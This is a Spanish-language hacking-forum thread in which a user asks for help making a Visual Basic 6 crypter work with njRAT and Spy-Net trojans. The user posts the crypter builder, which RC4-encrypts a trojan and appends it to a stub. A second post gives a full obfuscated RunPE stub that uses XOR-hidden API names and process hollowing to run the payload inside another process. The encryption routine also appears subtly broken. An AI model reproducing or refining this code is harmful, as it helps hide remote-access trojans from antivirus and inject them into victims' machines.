comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Problema con mi crypter

  • 2 Respuestas
  • 1011 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado paulitagonzales99

  • *
  • Underc0der
  • Mensajes: 17
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Agosto 26, 2016, 03:54:18 pm »
Hola! ayer me decidí a crear un crypter en Visual Basic 6 pero como no se casi nada de programación seguí el tutorial de Malawere Magazine #1 subido aquí en underc0de, luego de muchas horas de trabajo pues no conseguia que funcionara logre encriptar algunos servers de njrat 0.7d y otros de Spy Net, pero aquí viene el problema: a la hora de ejecutar los servers encriptados estos no conectaban probé con el spy net y el njrat pero ambos no conectaban mientras que la versión sin encriptar si funcionaba! Probé con diferentes Stubs (una creada por mi y otra que saque de un crypter para njrat) pero el server sigue sin conectar. Estoy seguro de que el problema esta en el crypter. Me pueden ayuadar a que mi crypter sea compatible con njrat, spy net o cualquier otro RAT? Que tengo que agregarle al código para que el crypter sea compatible? Recuerden que no entiendo mucho de programación así que hablo sobre la total ignorancia. Gracias por sus respuestas y saludos.

Aquí les dejo el código del crypter para que lo chequeen.

Código: Visual Basic
  1. Private Sub btnEncriptar_Click()
  2.  Dim Stub As String, Archivo As String
  3.  
  4.  If txtArchivo.Text = vbNullString Then
  5.  MsgBox "Debes cargar el archivo a encriptar", vbExclamation, Me.Caption
  6.  Exit Sub
  7.  Else
  8.  
  9.  Open App.Path & "\Stub.exe" For Binary As #1
  10.  Stub = Space(LOF(1))
  11.  Get #1, , Stub
  12.  Close #1
  13.  
  14.  Open txtArchivo.Text For Binary As #1
  15.  Archivo = Space(LOF(1))
  16.  Get #1, , Archivo
  17.  Close #1
  18.  
  19.  With CD
  20.  .DialogTitle = "Seleccione una ruta..."
  21.  .Filter = "Aplicaciones EXE|*.exe"
  22.  .ShowSave
  23.  End With
  24.  
  25.  If Not CD.FileName = vbNullString Then
  26.  
  27.  Archivo = RC4(Archivo, "Underc0de")
  28.  
  29.  Open CD.FileName For Binary As #1
  30.  Put #1, , Stub & "##$$##" & Archivo & "##$$##"
  31.  Close #1
  32.  
  33.  MsgBox "Archivo Encriptado", vbInformation, Me.Caption
  34.  End If
  35.  
  36.  End If
  37.  End Sub
  38.  
  39.  Public Function RC4(ByVal Data As String, ByVal Password As String) As String
  40.  On Error Resume Next
  41.  Dim F(0 To 255) As Integer, X, Y As Long, Key() As Byte
  42.  Key() = StrConv(Password, vbFromUnicode)
  43.  For X = 0 To 255
  44.  Y = (Y + F(X) + Key(X Mod Len(Password))) Mod 256
  45.  F(X) = X
  46.  Next X
  47.  Key() = StrConv(Data, vbFromUnicode)
  48.  For X = 0 To Len(Data)
  49.  Y = (Y + F(Y) + 1) Mod 256
  50.  Key(X) = Key(X) Xor F(Temp + F((Y + F(Y)) Mod 254))
  51.  Next X
  52.  RC4 = StrConv(Key, vbUnicode)
  53.  
  54.  End Function
  55.  
  56.  
  57.  
  58. Private Sub btnExaminar_Click()
  59.  With CD
  60.  .DialogTitle = "Seleccione un archivo"
  61.  .Filter = "Aplicaciones EXE|*.exe"
  62.  .ShowOpen
  63.  End With
  64.  
  65.  If Not CD.FileName = vbNullString Then
  66.  txtArchivo.Text = CD.FileName
  67.  End If
  68.  
  69.  
  70. End Sub
« Última modificación: Agosto 26, 2016, 04:11:56 pm por ANTRAX »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5339
  • Actividad:
    16.67%
  • Reputación 30
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Agosto 26, 2016, 04:13:59 pm »
Hola,
El problema no está en el código que acabas de subir. Debe estar en el stub.
Lo que hace este código es basicamente tomar el server y unirlo con el stub del crypter.
Si se esta rompiendo el problema esta en el stub y no acá.

Saludos,
ANTRAX


Desconectado paulitagonzales99

  • *
  • Underc0der
  • Mensajes: 17
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Agosto 26, 2016, 04:48:12 pm »
You are not allowed to view links. Register or Login
Hola,
El problema no está en el código que acabas de subir. Debe estar en el stub.
Lo que hace este código es basicamente tomar el server y unirlo con el stub del crypter.
Si se esta rompiendo el problema esta en el stub y no acá.

Saludos,
ANTRAX

Hola ANTRAX gracias por tu respuesta! Acabo de revisar el stub como tu dijiste y la verdad que note algo muy raro que la verdad no se si es normal o que: veras en el tutorial de malawer magazine decia que había que crear 2 módulos uno llamado RunPe y otro llamado stub y ahí copiar y pegar los respectivos códigos pues ahora volví a entrar al proyecto y me han desaparecido los módulos! Y apareció uno nuevo llamado RunPE (STUB.bas) y dentro de este modulo me aparece el siguiente código:
 

Código: Visual Basic
  1. Private Const CONTEXT_FULL As Long = &H10007
  2. Private Const MAX_PATH As Integer = 260
  3. Private Const CREATE_SUSPENDED As Long = &H4
  4. Private Const MEM_COMMIT As Long = &H1000
  5. Private Const MEM_RESERVE As Long = &H2000
  6. Private Const PAGE_EXECUTE_READWRITE As Long = &H40
  7.  
  8. Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  9. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
  10. Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long
  11.  
  12. Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
  13. Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
  14. Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
  15. Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
  16.  
  17. Private Type SECURITY_ATTRIBUTES
  18. nLength As Long
  19. lpSecurityDescriptor As Long
  20. bInheritHandle As Long
  21. End Type
  22.  
  23. Private Type STARTUPINFO
  24. cb As Long
  25. lpReserved As Long
  26. lpDesktop As Long
  27. lpTitle As Long
  28. dwX As Long
  29. dwY As Long
  30. dwXSize As Long
  31. dwYSize As Long
  32. dwXCountChars As Long
  33. dwYCountChars As Long
  34. dwFillAttribute As Long
  35. dwFlags As Long
  36. wShowWindow As Integer
  37. cbReserved2 As Integer
  38. lpReserved2 As Long
  39. hStdInput As Long
  40. hStdOutput As Long
  41. hStdError As Long
  42. End Type
  43.  
  44. Private Type PROCESS_INFORMATION
  45. hProcess As Long
  46. hThread As Long
  47. dwProcessId As Long
  48. dwThreadID As Long
  49. End Type
  50.  
  51. Private Type FLOATING_SAVE_AREA
  52. ControlWord As Long
  53. StatusWord As Long
  54. TagWord As Long
  55. ErrorOffset As Long
  56. ErrorSelector As Long
  57. DataOffset As Long
  58. DataSelector As Long
  59. RegisterArea(1 To 80) As Byte
  60. Cr0NpxState As Long
  61. End Type
  62.  
  63. Private Type CONTEXT
  64. ContextFlags As Long
  65.  
  66. Dr0 As Long
  67. Dr1 As Long
  68. Dr2 As Long
  69. Dr3 As Long
  70. Dr6 As Long
  71. Dr7 As Long
  72.  
  73. FloatSave As FLOATING_SAVE_AREA
  74. SegGs As Long
  75. SegFs As Long
  76. SegEs As Long
  77. SegDs As Long
  78. Edi As Long
  79. Esi As Long
  80. Ebx As Long
  81. Edx As Long
  82. Ecx As Long
  83. Eax As Long
  84. Ebp As Long
  85. Eip As Long
  86. SegCs As Long
  87. EFlags As Long
  88. Esp As Long
  89. SegSs As Long
  90. End Type
  91.  
  92. Private Type IMAGE_DOS_HEADER
  93. e_magic As Integer
  94. e_cblp As Integer
  95. e_cp As Integer
  96. e_crlc As Integer
  97. e_cparhdr As Integer
  98. e_minalloc As Integer
  99. e_maxalloc As Integer
  100. e_ss As Integer
  101. e_sp As Integer
  102. e_csum As Integer
  103. e_ip As Integer
  104. e_cs As Integer
  105. e_lfarlc As Integer
  106. e_ovno As Integer
  107. e_res(0 To 3) As Integer
  108. e_oemid As Integer
  109. e_oeminfo As Integer
  110. e_res2(0 To 9) As Integer
  111. e_lfanew As Long
  112. End Type
  113.  
  114. Private Type IMAGE_FILE_HEADER
  115. Machine As Integer
  116. NumberOfSections As Integer
  117. TimeDateStamp As Long
  118. PointerToSymbolTable As Long
  119. NumberOfSymbols As Long
  120. SizeOfOptionalHeader As Integer
  121. characteristics As Integer
  122. End Type
  123.  
  124. Private Type IMAGE_DATA_DIRECTORY
  125. VirtualAddress As Long
  126. Size As Long
  127. End Type
  128.  
  129. Private Type IMAGE_OPTIONAL_HEADER
  130. Magic As Integer
  131. MajorLinkerVersion As Byte
  132. MinorLinkerVersion As Byte
  133. SizeOfCode As Long
  134. SizeOfInitializedData As Long
  135. SizeOfUnitializedData As Long
  136. AddressOfEntryPoint As Long
  137. BaseOfCode As Long
  138. BaseOfData As Long
  139. ImageBase As Long
  140. SectionAlignment As Long
  141. FileAlignment As Long
  142. MajorOperatingSystemVersion As Integer
  143. MinorOperatingSystemVersion As Integer
  144. MajorImageVersion As Integer
  145. MinorImageVersion As Integer
  146. MajorSubsystemVersion As Integer
  147. MinorSubsystemVersion As Integer
  148. W32VersionValue As Long
  149. SizeOfImage As Long
  150. SizeOfHeaders As Long
  151. CheckSum As Long
  152. SubSystem As Integer
  153. DllCharacteristics As Integer
  154. SizeOfStackReserve As Long
  155. SizeOfStackCommit As Long
  156. SizeOfHeapReserve As Long
  157. SizeOfHeapCommit As Long
  158. LoaderFlags As Long
  159. NumberOfRvaAndSizes As Long
  160. DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
  161. End Type
  162.  
  163. Private Type IMAGE_NT_HEADERS
  164. Signature As Long
  165. FileHeader As IMAGE_FILE_HEADER
  166. OptionalHeader As IMAGE_OPTIONAL_HEADER
  167. End Type
  168.  
  169. Private Type IMAGE_SECTION_HEADER
  170. SecName As String * 8
  171. VirtualSize As Long
  172. VirtualAddress As Long
  173. SizeOfRawData As Long
  174. PointerToRawData As Long
  175. PointerToRelocations As Long
  176. PointerToLinenumbers As Long
  177. NumberOfRelocations As Integer
  178. NumberOfLinenumbers As Integer
  179. characteristics As Long
  180. End Type
  181.  
  182.  
  183. Public Function TOLNIYR(ByVal ONIW As String, ByVal ZKKTQ As String, ParamArray HDISUUU()) As Long
  184. Dim YOZXQ As Long, SBUH(&HEC00& - 1) As Byte, OXM As Long, HTPJULV As Long
  185.  
  186. HTPJULV = GetProcAddress(LoadLibraryA(ONIW), ZKKTQ)
  187. If HTPJULV = 0 Then Exit Function
  188.  
  189. YOZXQ = VarPtr(SBUH(0))
  190. RtlMoveMemory ByVal YOZXQ, &H59595958, &H4: YOZXQ = YOZXQ + 4
  191. RtlMoveMemory ByVal YOZXQ, &H5059, &H2: YOZXQ = YOZXQ + 2
  192. For OXM = UBound(HDISUUU) To 0 Step -1
  193. RtlMoveMemory ByVal YOZXQ, &H68, &H1: YOZXQ = YOZXQ + 1
  194. RtlMoveMemory ByVal YOZXQ, CLng(HDISUUU(OXM)), &H4: YOZXQ = YOZXQ + 4
  195. Next
  196. RtlMoveMemory ByVal YOZXQ, &HE8, &H1: YOZXQ = YOZXQ + 1
  197. RtlMoveMemory ByVal YOZXQ, HTPJULV - YOZXQ - 4, &H4: YOZXQ = YOZXQ + 4
  198. RtlMoveMemory ByVal YOZXQ, &HC3, &H1: YOZXQ = YOZXQ + 1
  199. TOLNIYR = CallWindowProcA(VarPtr(SBUH(0)), 0, 0, 0, 0)
  200. End Function
  201.  
  202. Public Function SKXXP(ByVal UTXLWH As String, ByVal IRWMR As String) As String
  203. Dim SAW As Long
  204.  
  205. For SAW = 1 To Len(UTXLWH)
  206. SKXXP = SKXXP & Chr(Asc(Mid(IRWMR, IIf(SAW Mod Len(IRWMR) <> 0, SAW Mod Len(IRWMR), Len(IRWMR)), 1)) Xor Asc(Mid(UTXLWH, SAW, 1)))
  207. Next SAW
  208. End Function
  209.  
  210. Public Sub IYUZKMM(ByVal MKRVR As String, ByRef DPWO() As Byte, MLPDO As String)
  211. Dim VPK As Long, SSYY As IMAGE_DOS_HEADER, LHBND As IMAGE_NT_HEADERS, NCSMST As IMAGE_SECTION_HEADER
  212. Dim WNPELGD As STARTUPINFO, FZRQGF As PROCESS_INFORMATION, BOXJCL As CONTEXT
  213.  
  214. WNPELGD.cb = Len(WNPELGD)
  215. RtlMoveMemory SSYY, DPWO(0), 64
  216. RtlMoveMemory LHBND, DPWO(SSYY.e_lfanew), 248
  217.  
  218. CreateProcessA MKRVR, " " & MLPDO, 0, 0, False, CREATE_SUSPENDED, 0, 0, WNPELGD, FZRQGF
  219. TOLNIYR SKXXP(Chr(33) & Chr(36) & Chr(38) & Chr(39) & Chr(47), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), SKXXP(Chr(1) & Chr(36) & Chr(23) & Chr(37) & Chr(46) & Chr(40) & Chr(55) & Chr(2) & Chr(46) & Chr(39) & Chr(50) & Chr(26) & Chr(48) & Chr(24) & Chr(63) & Chr(45) & Chr(38) & Chr(61) & Chr(33) & Chr(40), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), FZRQGF.hProcess, LHBND.OptionalHeader.ImageBase
  220. TOLNIYR SKXXP(Chr(36) & Chr(53) & Chr(48) & Chr(37) & Chr(38) & Chr(37) & Chr(116) & Chr(102), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), SKXXP(Chr(25) & Chr(57) & Chr(48) & Chr(63) & Chr(54) & Chr(40) & Chr(43) & Chr(21) & Chr(43) & Chr(46) & Chr(42) & Chr(54) & Chr(19) & Chr(51), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), FZRQGF.hProcess, LHBND.OptionalHeader.ImageBase, LHBND.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
  221. WriteProcessMemory FZRQGF.hProcess, ByVal LHBND.OptionalHeader.ImageBase, DPWO(0), LHBND.OptionalHeader.SizeOfHeaders, 0
  222.  
  223. For VPK = 0 To LHBND.FileHeader.NumberOfSections - 1
  224. RtlMoveMemory NCSMST, DPWO(SSYY.e_lfanew + 248 + 40 * VPK), Len(NCSMST)
  225. WriteProcessMemory FZRQGF.hProcess, ByVal LHBND.OptionalHeader.ImageBase + NCSMST.VirtualAddress, DPWO(NCSMST.PointerToRawData), NCSMST.SizeOfRawData, 0
  226. Next VPK
  227.  
  228. BOXJCL.ContextFlags = CONTEXT_FULL
  229. TOLNIYR SKXXP(Chr(36) & Chr(53) & Chr(48) & Chr(37) & Chr(38) & Chr(37) & Chr(116) & Chr(102), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), SKXXP(Chr(8) & Chr(53) & Chr(54) & Chr(31) & Chr(43) & Chr(59) & Chr(34) & Chr(53) & Chr(35) & Chr(1) & Chr(42) & Chr(59) & Chr(34) & Chr(46) & Chr(34) & Chr(58), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), FZRQGF.hThread, VarPtr(BOXJCL)
  230. WriteProcessMemory FZRQGF.hProcess, ByVal BOXJCL.Ebx + 8, LHBND.OptionalHeader.ImageBase, 4, 0
  231. BOXJCL.Eax = LHBND.OptionalHeader.ImageBase + LHBND.OptionalHeader.AddressOfEntryPoint
  232. TOLNIYR SKXXP(Chr(36) & Chr(53) & Chr(48) & Chr(37) & Chr(38) & Chr(37) & Chr(116) & Chr(102), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), SKXXP(Chr(28) & Chr(53) & Chr(54) & Chr(31) & Chr(43) & Chr(59) & Chr(34) & Chr(53) & Chr(35) & Chr(1) & Chr(42) & Chr(59) & Chr(34) & Chr(46) & Chr(34) & Chr(58), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), FZRQGF.hThread, VarPtr(BOXJCL)
  233. TOLNIYR SKXXP(Chr(36) & Chr(53) & Chr(48) & Chr(37) & Chr(38) & Chr(37) & Chr(116) & Chr(102), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), SKXXP(Chr(29) & Chr(53) & Chr(49) & Chr(62) & Chr(46) & Chr(44) & Chr(19) & Chr(60) & Chr(53) & Chr(39) & Chr(36) & Chr(49), "OPBKCIGTGBEUVKZNRTNFXNTODFQPYPMINXTSTRGCYJDEVTSWKCGOW"), FZRQGF.hThread
  234. End Sub
« Última modificación: Agosto 26, 2016, 05:05:58 pm por paulitagonzales99 »

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] Problema con Softice 4.05 Help, SoftICE is not active.

Iniciado por d3vilz5

Respuestas: 1
Vistas: 1625
Último mensaje Mayo 17, 2013, 11:52:31 pm
por Krapermors
Problema con conexión de troyano pierdo la conexion

Iniciado por Nitro_X_Net

Respuestas: 6
Vistas: 1485
Último mensaje Julio 13, 2015, 03:35:57 am
por .:UND3R:.
AVs CMLS Registry workshop.. Problema.! "Otra vez yo"

Iniciado por Zobek

Respuestas: 0
Vistas: 938
Último mensaje Julio 11, 2016, 06:19:19 pm
por Zobek
[SOLUCIONADO] Problema con el systemd en MJ (systemd-modules-load.service)

Iniciado por Thereldor

Respuestas: 1
Vistas: 833
Último mensaje Abril 05, 2016, 11:50:05 pm
por Thereldor
Booteo en Dell Inspiron Mini "problema"

Iniciado por KnarBlack

Respuestas: 2
Vistas: 502
Último mensaje Febrero 19, 2018, 11:44:52 pm
por KnarBlack